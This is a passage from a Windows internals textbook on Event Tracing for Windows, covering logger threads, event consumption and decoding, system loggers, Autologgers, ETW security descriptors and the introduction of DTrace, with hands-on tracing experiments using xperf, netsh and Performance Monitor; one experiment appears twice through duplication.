To verify that the session has actually started, repeat the steps described previously in the
“Enumerating ETW sessions” experiment. (The TestSession trace session should be listed by both
XPERF and the Windows Performance Monitor.) Now, you should start some new processes or
applications (like Notepad or Paint, for example).
To stop the ETW session, use the following command:
xperf -stop TestSession
The steps used for decoding the ETL file are described later in the “Decoding an ETL file”
experiment. Windows includes providers for almost all its components. The Microsoft-Windows-
MSPaint provider, for example, generates events based on Paint’s functionality. You can try this
experiment by capturing events from the MsPaint provider.
ETW Logger thread
The Logger thread is one of the most important entities in ETW. Its main purpose is to flush events to
the log file or deliver them to the real-time consumer, keeping track of the number of delivered and
lost events. A logger thread is started every time an ETW session is initially created, but only in case the
session does not use the circular log mode. Its execution logic is simple. After it’s started, it links itself
to the ETW_LOGGER_CONTEXT data structure representing the associated ETW session and waits on
two main synchronization objects. The Flush event is signaled by ETW every time a buffer belonging
to a session becomes full (which can happen after a new event has been generated by a provider—for
example, as discussed in the previous section, “Providing events”), when a new real-time consumer
has requested to be connected, or when a logger session is going to be stopped. The TimeOut timer is
initialized to a valid value (usually 1 second) only in case the session is a real-time one or in case the user
has explicitly required it when calling the StartTrace API for creating the new session.
When one of the two synchronization objects is signaled, the logger thread rearms them and
checks whether the file system is ready. If not, the main logger thread returns to sleep again (no ses-
sions should be flushed in early boot stages). Otherwise, it starts to flush each buffer belonging to the
session to the log file or the real-time consumer.
For real-time sessions, the logger thread first creates a temporary per-session ETL file in the
%SystemRoot%\System32\LogFiles\WMI\RtBackup folder (as shown in Figure 10-35). The log file name
is generated by adding the EtwRT prefix to the name of the real-time session. The file is used for saving
temporary events before they are delivered to a real-time consumer (the log file can also store lost events
that have not been delivered to the consumer in the proper time frame). When started, real-time auto-
loggers restore lost events from the log file with the goal of delivering them to their consumer.
FIGURE 10-35 Real-time temporary ETL log files.
The logger thread is the only entity able to establish a connection between a real-time consumer
and the session. The first time that a consumer calls the ProcessTrace API for receiving events from a
real-time session, ETW sets up a new RealTimeConsumer object and uses it with the goal of creating a
link between the consumer and the real-time session. The object, which resolves to an ETW_REALTIME_
CONSUMER data structure in the NT kernel, allows events to be “injected” in the consumer’s process
address space (another user-mode buffer is provided by the consumer application).
For non–real-time sessions, the logger thread opens (or creates, in case the file does not exist) the
initial ETL log file specified by the entity that created the session. The logger thread can also create a
brand-new log file in case the session’s log mode specifies the EVENT_TRACE_FILE_MODE_NEWFILE
flag, and the current log file reaches the maximum size.
At this stage, the ETW logger thread initiates a flush of all the buffers associated with the session
to the current log file (which, as discussed, can be a temporary one for real-time sessions). The flush is
performed by adding an event header to each event in the buffer and by using the NtWriteFile API for
writing the binary content to the ETL log file. For real-time sessions, the next time the logger thread
wakes up, it is able to inject all the events stored in the temporary log file to the target user-mode real-
time consumer application. Thus, for real-time sessions, ETW events are never delivered synchronously.
Consuming events
Event consumption in ETW is performed almost entirely in user mode by a consumer application,
thanks to services provided by Sechost.dll. The consumer application uses the OpenTrace API
for opening an ETL log file produced by the main logger thread or for establishing the connection to
a real-time logger. The application specifies an event callback function, which is called every time ETW
consumes a single event. Furthermore, for real-time sessions, the application can supply an optional
buffer-callback function, which receives statistics for each buffer that ETW flushes and is called every
time a single buffer is full and has been delivered to the consumer.
The actual event consumption is started by the ProcessTrace API. The API works for both standard
and real-time sessions, depending on the log file mode flags passed previously to OpenTrace.
For real-time sessions, the API uses kernel mode services (accessed through the NtTraceControl
system call) to verify that the ETW session is really a real-time one. The NT kernel verifies that the secu-
rity descriptor of the ETW session grants the TRACELOG_ACCESS_REALTIME access right to the caller
process’s token. If it doesn’t have access, the API fails and returns an error to the controller applica-
tion. Otherwise, it allocates a temporary user-mode buffer and a bitmap used for receiving events and
connects to the main logger thread (which creates the associated EtwConsumer object; see the “ETW
logger thread” section earlier in this chapter for details). Once the connection is established, the API
waits for new data arriving from the session’s logger thread. When the data comes, the API enumerates
each event and calls the event callback.
For normal non–real-time ETW sessions, the ProcessTrace API performs a similar processing, but
instead of connecting to the logger thread, it just opens and parses the ETL log file, reading each buf-
fer one by one and calling the event callback for each found event (events are sorted in chronological
order). Unlike real-time loggers, which can be consumed only one at a time, in this case the API
can work even with multiple trace handles created by the OpenTrace API, which means that it can parse
events from different ETL log files.
Events belonging to ETW sessions that use circular buffers are not processed using the described
methodology. (There is indeed no logger thread that dumps any event.) Usually a controller applica-
tion uses the FlushTrace API when it wants to dump a snapshot of the current buffers belonging to an
ETW session configured to use a circular buffer into a log file. The API invokes the NT kernel through
the NtTraceControl system call, which locates the ETW session and verifies that its security descrip-
tor grants the TRACELOG_CREATE_ONDISK access right to the calling process’s access token. If so,
and if the controller application has specified a valid log file name, the NT kernel invokes the internal
EtwpBufferingModeFlush routine, which creates the new ETL file, adds the proper headers, and writes
all the buffers associated with the session. A consumer application can then parse the events written in
the new log file by using the OpenTrace and ProcessTrace APIs, as described earlier.
Events decoding
When the ProcessTrace API identifies a new event in an ETW buffer, it calls the event callback, which
is generally located in the consumer application. To be able to correctly process the event, the con-
sumer application should decode the event payload. The Event Trace Decode Helper Library (TDH.dll)
provides services to consumer applications for decoding events. As discussed in the previous sections,
a provider application (or driver) should include information that describes how to decode the events
generated by its registered providers.
This information is encoded differently based on the provider type. Manifest-based providers, for
example, compile the XML descriptor of their events in a binary file and store it in the resource section
of their provider application (or driver). As part of provider registration, a setup application should
register the provider’s binary in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\
Publishers registry key. The latter is important for event decoding, especially for the following reasons:
■ The system consults the Publishers key when it wants to resolve a provider name to its GUID (from an ETW point of view, providers do not have a name). This allows tools like Xperf to display readable provider names instead of their GUIDs.

■ The Trace Decode Helper Library consults the key to retrieve the provider's binary file, parse its resource section, and read the binary content of the events descriptor.
After the event descriptor is obtained, the Trace Decode Helper Library gains all the needed infor-
mation for decoding the event (by parsing the binary descriptor) and allows consumer applications
to use the TdhGetEventInformation API to retrieve all the fields that compose the event’s payload and
the correct interpretation of the data associated with them. TDH follows a similar procedure for MOF and
WPP providers (while TraceLogging incorporates all the decoding data in the event payload, which fol-
lows a standard binary format).
Note that all events are natively stored by ETW in an ETL log file, which has a well-defined uncom-
pressed binary format and does not contain event decoding information. This means that if an ETL file
is opened by another system that has not acquired the trace, there is a good probability that it will not
be able to decode the events. To overcome these issues, the Event Viewer uses another binary format:
EVTX. This format includes all the events and their decoding information and can be easily parsed by
any application. An application can use the EvtExportLog Windows Event Log API to save the events
included in an ETL file with their decoding information in an EVTX file.
EXPERIMENT: Decoding an ETL file
Windows has multiple tools that use the EvtExportLog API to automatically convert an ETL log file
and include all the decoding information. In this experiment, you use netsh.exe, but TraceRpt.exe
also works well:
1. Open a command prompt and move to the folder where the ETL file produced by the previous experiment ("Listing processes activity using ETW") resides, and insert

netsh trace convert input=process_trace.etl output=process_trace.txt dump=txt overwrite=yes

2. In the command, process_trace.etl is the name of the input log file, and process_trace.txt is the name of the output decoded text file.

3. If you open the text file, you will find all the decoded events (one for each line) with a description, like the following:

[2]1B0C.1154::2020-05-01 12:00:42.075601200 [Microsoft-Windows-Kernel-Process] Process 1808 started at time 2020-05-01T19:00:42.075562700Z by parent 6924 running in session 1 with name \Device\HarddiskVolume4\Windows\System32\notepad.exe.

4. From the log, you will find that a few events are not decoded completely or do not contain any description. This is because the provider manifest does not include the needed information (a good example is given by the ThreadWorkOnBehalfUpdate event). You can get rid of those events by acquiring a trace that does not include their keyword. The event keyword is stored in the CSV or EVTX file.

5. Use netsh.exe to produce an EVTX file with the following command:

netsh trace convert input=process_trace.etl output=process_trace.evtx dump=evtx overwrite=yes

6. Open the Event Viewer. In the console tree located on the left side of the window, right-click the Event Viewer (Local) root node and select Open Saved Logs. Choose the just-created process_trace.evtx file and click Open.

7. In the Open Saved Log window, you should give the log a name and select a folder in which to display it. (The example accepted the default name, process_trace, and the default Saved Logs folder.)
8. The Event Viewer should now display each event located in the log file. Click the Date and Time column to order the events by date and time in ascending order (from the oldest to the newest). Search for ProcessStart with Ctrl+F to find the event indicating the Notepad.exe process creation.

9. The ThreadWorkOnBehalfUpdate event, which has no human-readable description, causes too much noise, and you should get rid of it from the trace. If you click one of those events and open the Details tab, in the System node, you will find that the event belongs to the WINEVENT_KEYWORD_WORK_ON_BEHALF category, which has a keyword bitmask set to 0x8000000000002000. (Keep in mind that the highest 16 bits of the keywords are reserved for Microsoft-defined categories.) The bitwise NOT operation of the 0x8000000000002000 64-bit value is 0x7FFFFFFFFFFFDFFF.

10. Close the Event Viewer and capture another trace with XPERF by using the following command:

xperf -start TestSession -on Microsoft-Windows-Kernel-Process:0x7FFFFFFFFFFFDFFF -f c:\process_trace.etl

11. Open Notepad or some other application and stop the trace as explained in the "Listing processes activity using ETW" experiment. Convert the ETL file to an EVTX. This time, the obtained decoded log should be smaller in size, and it does not contain ThreadWorkOnBehalfUpdate events.
System loggers
What we have described so far is how normal ETW sessions and providers work. Since Windows XP,
ETW has supported the concept of system loggers, which allow the NT kernel to globally emit log
events that are not tied to any provider and are generally used for performance measurements. At
the time of this writing, there are two main system loggers available, which are represented by the NT
kernel logger and Circular Kernel Context Logger (while the Global logger is a subset of the NT kernel
logger). The NT kernel supports a maximum of eight system logger sessions. Every session that receives
events from a system logger is considered a system session.
To start a system session, an application makes use of the StartTrace API, but it specifies the EVENT_
TRACE_SYSTEM_LOGGER_MODE flag or the GUID of a system logger session as input parameters.
Table 10-16 lists the system loggers with their GUIDs. The EtwpStartLogger function in the NT kernel
recognizes the flag or the special GUIDs and performs an additional check against the NT kernel log-
ger security descriptor, requesting the TRACELOG_GUID_ENABLE access right on behalf of the caller
process access token. If the check passes, ETW calculates a system logger index and updates both the
logger group mask and the system global performance group mask.
TABLE 10-16 System loggers

Index | Name                           | GUID                                   | Symbol
0     | NT kernel logger               | {9e814aad-3204-11d2-9a82-006008a86939} | SystemTraceControlGuid
1     | Global logger                  | {e8908abc-aa84-11d2-9a93-00805f85d7c6} | GlobalLoggerGuid
2     | Circular Kernel Context Logger | {54dea73a-ed1f-42a4-af71-3e63d056f174} | CKCLGuid
The last step is the key that drives system loggers. Multiple low-level system functions, which can
run at a high IRQL (the Context Swapper is a good example), analyze the performance group mask
and decide whether to write an event to the system logger. A controller application can enable or
disable different events logged by a system logger by modifying the EnableFlags bit mask used by the
StartTrace API and ControlTrace API. The events logged by a system logger are stored internally in the
global performance group mask in a well-defined order. The mask is composed of an array of eight 32-
bit values. Each index in the array represents a set of events. System event sets (also called Groups) can
be enumerated using the Xperf tool. Table 10-17 lists the system logger events and the classification in
their groups. Most of the system logger events are documented at https://docs.microsoft.com/en-us/
windows/win32/api/evntrace/ns-evntrace-event_trace_properties.
TABLE 10-17 System logger events (kernel flags) and their group

Name             | Description                                                                   | Group
ALL_FAULTS       | All page faults including hard, copy-on-write, demand-zero faults, and so on | None
ALPC             | Advanced Local Procedure Call                                                 | None
CACHE_FLUSH      | Cache flush events                                                            | None
CC               | Cache manager events                                                          | None
CLOCKINT         | Clock interrupt events                                                        | None
COMPACT_CSWITCH  | Compact context switch                                                        | Diag
CONTMEMGEN       | Contiguous memory generation                                                  | None
CPU_CONFIG       | NUMA topology, processor group, and processor index                           | None
CSWITCH          | Context switch                                                                | IOTrace
DEBUG_EVENTS     | Debugger scheduling events                                                    | None
DISK_IO          | Disk I/O                                                                      | All except SysProf, ReferenceSet, and Network
DISK_IO_INIT     | Disk I/O initiation                                                           | None
DISPATCHER       | CPU scheduler                                                                 | None
DPC              | DPC events                                                                    | Diag, DiagEasy, and Latency
DPC_QUEUE        | DPC queue events                                                              | None
DRIVERS          | Driver events                                                                 | None
FILE_IO          | File system operation end times and results                                   | FileIO
FILE_IO_INIT     | File system operation (create/open/close/read/write)                          | FileIO
FILENAME         | FileName (e.g., FileName create/delete/rundown)                               | None
FLT_FASTIO       | Minifilter fastio callback completion                                         | None
FLT_IO           | Minifilter callback completion                                                | None
FLT_IO_FAILURE   | Minifilter callback completion with failure                                   | None
FLT_IO_INIT      | Minifilter callback initiation                                                | None
FOOTPRINT        | Support footprint analysis                                                    | ReferenceSet
HARD_FAULTS      | Hard page faults                                                              | All except SysProf and Network
HIBERRUNDOWN     | Rundown(s) during hibernate                                                   | None
IDLE_STATES      | CPU idle states                                                               | None
INTERRUPT        | Interrupt events                                                              | Diag, DiagEasy, and Latency
INTERRUPT_STEER  | Interrupt steering events                                                     | Diag, DiagEasy, and Latency
IPI              | Inter-processor interrupt events                                              | None
KE_CLOCK         | Clock configuration events                                                    | None
KQUEUE           | Kernel queue enqueue/dequeue                                                  | None
LOADER           | Kernel and user mode image load/unload events                                 | Base
MEMINFO          | Memory list info                                                              | Base, ResidentSet, and ReferenceSet
MEMINFO_WS       | Working set info                                                              | Base and ReferenceSet
MEMORY           | Memory tracing                                                                | ResidentSet and ReferenceSet
NETWORKTRACE     | Network events (e.g., tcp/udp send/receive)                                   | Network
OPTICAL_IO       | Optical I/O                                                                   | None
OPTICAL_IO_INIT  | Optical I/O initiation                                                        | None
PERF_COUNTER     | Process perf counters                                                         | Diag and DiagEasy
PMC_PROFILE      | PMC sampling events                                                           | None
POOL             | Pool tracing                                                                  | None
POWER            | Power management events                                                       | ResumeTrace
PRIORITY         | Priority change events                                                        | None
PROC_THREAD      | Process and thread create/delete                                              | Base
PROFILE          | CPU sample profile                                                            | SysProf
REFSET           | Support footprint analysis                                                    | ReferenceSet
REG_HIVE         | Registry hive tracing                                                         | None
REGISTRY         | Registry tracing                                                              | None
SESSION          | Session rundown/create/delete events                                          | ResidentSet and ReferenceSet
SHOULDYIELD      | Tracing for the cooperative DPC mechanism                                     | None
SPINLOCK         | Spinlock collisions                                                           | None
SPLIT_IO         | Split I/O                                                                     | None
SYSCALL          | System calls                                                                  | None
TIMER            | Timer settings and its expiration                                             | None
VAMAP            | MapFile info                                                                  | ResidentSet and ReferenceSet
VIRT_ALLOC       | Virtual allocation reserve and release                                        | ResidentSet and ReferenceSet
WDF_DPC          | WDF DPC events                                                                | None
WDF_INTERRUPT    | WDF Interrupt events                                                          | None
When the system session starts, events are immediately logged. There is no provider that needs
to be enabled. This implies that a consumer application has no way to generically decode the event.
System logger events use a precise event encoding format (called NTPERF), which depends on the
event type. However, most of the data structures representing different NT kernel logger events are
usually documented in the Windows platform SDK.
EXPERIMENT: Tracing TCP/IP activity with the kernel logger
In this experiment, you listen to the network activity events generated by the System Logger
using the Windows Performance Monitor. As already introduced in the “Enumerating ETW ses-
sions” experiment, the graphical tool is not just able to obtain data from the system performance
counters but is also able to start, stop, and manage ETW sessions (system session included). To
enable the kernel logger and have it generate a log file of TCP/IP activity, follow these steps:
1. Run the Performance Monitor (by typing perfmon in the Cortana search box) and click Data Collector Sets, User Defined.

2. Right-click User Defined, choose New, and select Data Collector Set.

3. When prompted, enter a name for the data collector set (for example, experiment), and choose Create Manually (Advanced) before clicking Next.

4. In the dialog box that opens, select Create Data Logs, check Event Trace Data, and then click Next. In the Providers area, click Add, and locate Windows Kernel Trace. Click OK. In the Properties list, select Keywords (Any), and then click Edit.

5. From the list shown in the Property window, select Automatic and check only net for Network TCP/IP, and then click OK.
EXPERIMENT: Tracing TCP/IP activity with the kernel logger
In this experiment, you listen to the network activity events generated by the System Logger
using the Windows Performance Monitor. As already introduced in the “Enumerating ETW ses-
sions” experiment, the graphical tool is not just able to obtain data from the system performance
counters but is also able to start, stop, and manage ETW sessions (system session included). To
enable the kernel logger and have it generate a log file of TCP/IP activity, follow these steps:
1.
Run the Performance Monitor (by typing perfmon in the Cortana search box) and click
Data Collector Sets, User Defined.
2.
Right-click User Defined, choose New, and select Data Collector Set.
3.
When prompted, enter a name for the data collector set (for example, experiment),
and choose Create Manually (Advanced) before clicking Next.
4.
In the dialog box that opens, select Create Data Logs, check Event Trace Data, and
then click Next. In the Providers area, click Add, and locate Windows Kernel Trace. Click
OK. In the Properties list, select Keywords (Any), and then click Edit.
5.
From the list shown in the Property window, select Automatic and check only net for
Network TCP/IP, and then click OK.
520
CHAPTER 10 Management, diagnostics, and tracing
6.
Click Next to select a location where the files are saved. By default, this location is
%SystemDrive%\PerfLogs\Admin\experiment\, if this is how you named the data
collector set. Click Next, and in the Run As edit box, enter the Administrator account
name and set the password to match it. Click Finish. You should now see a window
similar to the one shown here:
7.
Right-click the name you gave your data collector set (experiment in our example), and
then click Start. Now generate some network activity by opening a browser and visiting
a website.
8.
Right-click the data collector set node again and then click Stop.
If you follow the steps listed in the “Decoding an ETL file” experiment to decode the acquired
ETL trace file, you will find that the best way to read the results is by using a CSV file type. This
is because the System session does not include any decoding information for the events, so
netsh.exe has no standard way to encode the customized data structures representing events in
the EVTX file.
Finally, you can repeat the experiment using XPERF with the following command (optionally
replacing the C:\network.etl file with your preferred name):
xperf -on NETWORKTRACE -f c:\network.etl
After you stop the system trace session and you convert the obtained trace file, you will get
similar events as the ones obtained with the Performance Monitor.
The Global logger and Autologgers
Certain logger sessions start automatically when the system boots. The Global logger session records
events that occur early in the operating system boot process, including events generated by the NT
kernel logger. (The Global logger is actually a system logger, as shown in Table 10-16.) Applications
and device drivers can use the Global logger session to capture traces before the user logs in (some
device drivers, such as disk device drivers, are not loaded at the time the Global logger session be-
gins.) While the Global logger is mostly used to capture traces produced by the NT kernel provider
(see Table 10-17), Autologgers are designed to capture traces from classic ETW providers (and not
from the NT kernel logger).
You can configure the Global logger by setting the proper registry values in the GlobalLogger key, which
is located in the HKLM\SYSTEM\CurrentControlSet\Control\WMI root key. In the same way, Autologgers
can be configured by creating a registry subkey, named after the logging session, in the Autologger key
(located in the same WMI root key). The procedure for configuring and starting Autologgers is documented at
https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-Autologger-session.
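As a sketch of that registry layout, the fragment below describes an Autologger session with one enabled provider. The session name, GUIDs, and log path are hypothetical; the value names (Start, Guid, FileName, Enabled, EnableLevel, MatchAnyKeyword) follow the documented Autologger configuration:

```reg
Windows Registry Editor Version 5.00

; Hypothetical Autologger session named "MyBootSession"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\MyBootSession]
; Start the session at the next boot
"Start"=dword:00000001
; GUID identifying the session (hypothetical value)
"Guid"="{11111111-2222-3333-4444-555555555555}"
; Log file that receives the events
"FileName"="C:\\Logs\\MyBootSession.etl"

; One provider to enable in the session, identified by its GUID (hypothetical value)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\MyBootSession\{66666666-7777-8888-9999-aaaaaaaaaaaa}]
"Enabled"=dword:00000001
; TRACE_LEVEL_INFORMATION
"EnableLevel"=dword:00000004
; REG_QWORD keyword mask; all bits set to match every keyword
"MatchAnyKeyword"=hex(b):ff,ff,ff,ff,ff,ff,ff,ff
```

After a reboot, a session registered this way would be enumerated by ETW during phase 1 of kernel initialization, as described above.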
As introduced in the “ETW initialization” section previously in this chapter, ETW starts the Global log-
ger and Autologgers almost at the same time, during the early phase 1 of the NT kernel initialization. The
EtwStartAutoLogger internal function queries all the logger configuration data from the registry, validates
it, and creates the logger session using the EtwpStartLogger routine, which has already been extensively
discussed in the “ETW sessions” section. The Global logger is a system logger, so after the session is cre-
ated, no further providers are enabled. Unlike the Global logger, Autologgers require providers to be
enabled. They are started by enumerating each session’s name from the Autologger registry key. After a
session is created, ETW enumerates the providers that should be enabled in the session, which are listed
as subkeys of the Autologger key (a provider is identified by a GUID). Figure 10-36 shows the multiple pro-
viders enabled in the EventLog-System session. This session is one of the main Windows Logs displayed
by the Windows Event Viewer (captured by the Event Logger service).
FIGURE 10-36 The EventLog-System Autologger’s enabled providers.
After the configuration data of a provider is validated, the provider is enabled in the session through
the internal EtwpEnableTrace function, as for classic ETW sessions.
ETW security
Starting and stopping an ETW session is considered a high-privilege operation because events can
include system data that can be used to compromise system integrity (this is especially true for system
loggers). The Windows Security model has been extended to support ETW security. As already introduced
in previous sections, each operation performed by ETW requires a well-defined access right that must
be granted by a security descriptor protecting the session, provider, or provider’s group (depending on
the operation). Table 10-18 lists all the new access rights introduced for ETW and their usage.
TABLE 10-18 ETW security access rights and their usage
Value (Applied to)  Description

WMIGUID_QUERY (Session)  Allows the user to query information about the trace session.
WMIGUID_NOTIFICATION (Session)  Allows the user to send a notification to the session’s notification provider.
TRACELOG_CREATE_REALTIME (Session)  Allows the user to start or update a real-time session.
TRACELOG_CREATE_ONDISK (Session)  Allows the user to start or update a session that writes events to a log file.
TRACELOG_GUID_ENABLE (Provider)  Allows the user to enable the provider.
TRACELOG_LOG_EVENT (Session)  Allows the user to log events to a trace session if the session is running in SECURE mode.
TRACELOG_ACCESS_REALTIME (Session)  Allows a consumer application to consume events in real time.
TRACELOG_REGISTER_GUIDS (Provider)  Allows the user to register the provider (creating the EtwRegistration object backed by the ETW_REG_ENTRY data structure).
TRACELOG_JOIN_GROUP (Provider)  Allows the user to insert a manifest-based or tracelogging provider to a Providers group (part of the ETW traits, which are not described in this book).
Most of the ETW access rights are automatically granted to the SYSTEM account and to members of
the Administrators, Local Service, and Network Service groups. This implies that normal users are not
allowed to interact with ETW (unless an explicit session and provider security descriptor allows it). To
overcome the problem, Windows includes the Performance Log Users group, which has been designed
to allow normal users to interact with ETW (especially for controlling trace sessions). Although all the
ETW access rights are granted by the default security descriptor to the Performance Log Users group,
Windows supports another group, called Performance Monitor Users, which has been designed only
to receive or send notifications to the session notification provider. This is because the group has been
designed to access system performance counters, enumerated by tools like Performance Monitor and
Resource Monitor, and not to access the full ETW events. The two tools have already been described in
the “Performance monitor and resource monitor” section of Chapter 1 in Part 1.
As previously introduced in the “ETW Sessions” section of this chapter, all the ETW security descrip-
tors are stored in the HKLM\System\CurrentControlSet\Control\Wmi\Security registry key in a binary
format. In ETW, everything that is represented by a GUID can be protected by a customized security
descriptor. To manage ETW security, applications usually do not directly interact with security descrip-
tors stored in the registry but use the EventAccessControl and EventAccessQuery APIs implemented
in Sechost.dll.
EXPERIMENT: Witnessing the default security descriptor of ETW sessions
A kernel debugger can easily show the default security descriptor associated with ETW sessions
that do not have a specific one associated with them. In this experiment, you need a Windows 10
machine with a kernel debugger already attached and connected to a host system. Otherwise,
you can use a local kernel debugger, or LiveKd (downloadable from https://docs.microsoft.com/
en-us/sysinternals/downloads/livekd.) After the correct symbols are configured, you should be
able to dump the default SD using the following command:
!sd poi(nt!EtwpDefaultTraceSecurityDescriptor)
The output should be similar to the following (cut for space reasons):
->Revision: 0x1
->Sbz1 : 0x0
->Control : 0x8004
SE_DACL_PRESENT
SE_SELF_RELATIVE
->Owner : S-1-5-32-544
->Group : S-1-5-32-544
->Dacl :
->Dacl : ->AclRevision: 0x2
->Dacl : ->Sbz1 : 0x0
->Dacl : ->AclSize : 0xf0
->Dacl : ->AceCount : 0x9
->Dacl : ->Sbz2 : 0x0
->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[0]: ->AceFlags: 0x0
->Dacl : ->Ace[0]: ->AceSize: 0x14
->Dacl : ->Ace[0]: ->Mask : 0x00001800
->Dacl : ->Ace[0]: ->SID: S-1-1-0
->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[1]: ->AceFlags: 0x0
->Dacl : ->Ace[1]: ->AceSize: 0x14
->Dacl : ->Ace[1]: ->Mask : 0x00120fff
->Dacl : ->Ace[1]: ->SID: S-1-5-18
->Dacl : ->Ace[2]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[2]: ->AceFlags: 0x0
->Dacl : ->Ace[2]: ->AceSize: 0x14
->Dacl : ->Ace[2]: ->Mask : 0x00120fff
->Dacl : ->Ace[2]: ->SID: S-1-5-19
->Dacl : ->Ace[3]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[3]: ->AceFlags: 0x0
->Dacl : ->Ace[3]: ->AceSize: 0x14
->Dacl : ->Ace[3]: ->Mask : 0x00120fff
->Dacl : ->Ace[3]: ->SID: S-1-5-20
->Dacl : ->Ace[4]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[4]: ->AceFlags: 0x0
->Dacl : ->Ace[4]: ->AceSize: 0x18
->Dacl : ->Ace[4]: ->Mask : 0x00120fff
->Dacl : ->Ace[4]: ->SID: S-1-5-32-544
->Dacl : ->Ace[5]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[5]: ->AceFlags: 0x0
->Dacl : ->Ace[5]: ->AceSize: 0x18
->Dacl : ->Ace[5]: ->Mask : 0x00000ee5
->Dacl : ->Ace[5]: ->SID: S-1-5-32-559
->Dacl : ->Ace[6]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[6]: ->AceFlags: 0x0
->Dacl : ->Ace[6]: ->AceSize: 0x18
->Dacl : ->Ace[6]: ->Mask : 0x00000004
->Dacl : ->Ace[6]: ->SID: S-1-5-32-558
You can use the Psgetsid tool (available at https://docs.microsoft.com/en-us/sysinternals/
downloads/psgetsid) to translate the SID to human-readable names. From the preceding output,
you can see that all ETW access is granted to the SYSTEM (S-1-5-18), LOCAL SERVICE (S-1-5-19),
NETWORK SERVICE (S-1-5-20), and Administrators (S-1-5-32-544) groups. As explained in the previous
section, the Performance Log Users group (S-1-5-32-559) has almost all ETW access, whereas the
Performance Monitor Users group (S-1-5-32-558) has only the WMIGUID_NOTIFICATION access
right granted by the session’s default security descriptor.
C:\Users\andrea>psgetsid64 S-1-5-32-559
PsGetSid v1.45 - Translates SIDs to names and vice versa
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Account for AALL86-LAPTOP\S-1-5-32-559:
Alias: BUILTIN\Performance Log Users
Security Audit logger
The Security Audit logger is an ETW session used by the Windows Event logger service (wevtsvc.dll) to
listen for events generated by the Security Lsass Provider. The Security Lsass provider (which is identi-
fied by the {54849625-5478-4994-a5ba-3e3b0328c30d} GUID) can be registered only by the NT kernel
at ETW initialization time and is never inserted in the global provider’s hash table. Only the Security
audit logger and Autologgers configured with the EnableSecurityProvider registry value set to 1 can re-
ceive events from the Security Lsass Provider. When the EtwStartAutoLogger internal function encoun-
ters the value set to 1, it enables the SECURITY_TRACE flag on the associated ETW session, adding the
session to the list of loggers that can receive Security audit events.
The flag also has the important effect that user-mode applications can’t query, stop, flush, or control
the session anymore, unless they are running as protected process light (at the antimalware, Windows,
or WinTcb level; further details on protected processes are available in Chapter 3 of Part 1).
Secure loggers
Classic (MOF) and WPP providers have not been designed to support all the security features imple-
mented for manifest-based and tracelogging providers. An Autologger or a generic ETW session can
thus be created with the EVENT_TRACE_SECURE_MODE flag, which marks the session as secure. A
secure session has the goal of ensuring that it receives events only from trusted identities. The flag has
two main effects:
- Prevents classic (MOF) and WPP providers from writing any event to the secure session. If a classic
provider is enabled in a secure session, the provider won’t be able to generate any events.
- Requires the supplemental TRACELOG_LOG_EVENT access right, which should be granted by
the session’s security descriptor to the controller application’s access token while enabling a
provider to the secure session.

The TRACELOG_LOG_EVENT access right allows a more granular security policy to be specified in a session’s
security descriptor. If the security descriptor grants only TRACELOG_GUID_ENABLE to an untrusted
user, and the ETW session is created as secure by another entity (a kernel driver or a more privileged
application), the untrusted user can’t enable any provider on the secure session. If the session is created
as nonsecure, the untrusted user can enable any providers on it.
Dynamic tracing (DTrace)
As discussed in the previous section, Event Tracing for Windows is a powerful tracing technology inte-
grated into the OS, but it’s static, meaning that the end user can only trace and log events that are gen-
erated by well-defined components belonging to the operating system or to third-party frameworks/
applications (.NET CLR, for example.) To overcome the limitation, the May 2019 Update of Windows
10 (19H1) introduced DTrace, the dynamic tracing facility built into Windows. DTrace can be used by
administrators on live systems to examine the behavior of both user programs and of the operating
system itself. DTrace is an open-source technology that was developed for the Solaris operating system
(and its descendant, illumos, both of which are Unix-based) and ported to several operating systems
other than Windows.
DTrace can dynamically trace parts of the operating system and user applications at certain locations
of interest, called probes. A probe is a binary code location or activity to which DTrace can bind a request
to perform a set of actions, like logging messages, recording a stack trace, a timestamp, and so on. When
a probe fires, DTrace gathers the data from the probe and executes the actions associated with the probe.
Both the probes and the actions are specified in a script file (or directly in the DTrace application through
the command line), using the D programming language. Support for probes is provided by kernel modules,
called providers. The original illumos DTrace supported around 20 providers, which were deeply tied
to the Unix-based OS. At the time of this writing, Windows supports the following providers:
- SYSCALL  Allows the tracing of the OS system calls (both on entry and on exit) invoked from
user-mode applications and kernel-mode drivers (through Zw APIs).
- FBT (Function Boundary Tracing)  Through FBT, a system administrator can trace the execution
of individual functions implemented in all the modules that run in the NT kernel.
- PID (User-mode process tracing)  The provider is similar to FBT and allows tracing of individual
functions of a user-mode process and application.
- ETW (Event Tracing for Windows)  DTrace can use this provider to attach to manifest-based and
TraceLogging events fired from the ETW engine. DTrace is able to define new ETW providers and
provide associated ETW events via the etw_trace action (which is not part of any provider).
- PROFILE  Provides probes associated with a time-based interrupt firing every fixed, specified
time interval.
- DTRACE  This built-in provider is implicitly enabled in the DTrace engine.
The listed providers allow system administrators to dynamically trace almost every component of
the Windows operating system and user-mode applications.
Note There are big differences between the first version of DTrace for Windows, which
appeared in the May 2019 Update of Windows 10, and the current stable release (distributed
at the time of this writing in the May 2021 edition of Windows 10). One of the most notable
differences is that the first release required a kernel debugger to be set up to enable the FBT
provider. Furthermore, the ETW provider was not completely available in the first release
of DTrace.
EXPERIMENT: Enabling DTrace and listing the installed providers
In this experiment, you install and enable DTrace and list the providers that are available for
dynamically tracing various Windows components. You need a system with Windows 10 May
2020 Update (20H1) or later installed. As explained in the Microsoft documentation (https://docs.
microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace), you should first enable DTrace
by opening an administrative command prompt and typing the following command (remember
to disable Bitlocker, if it is enabled):
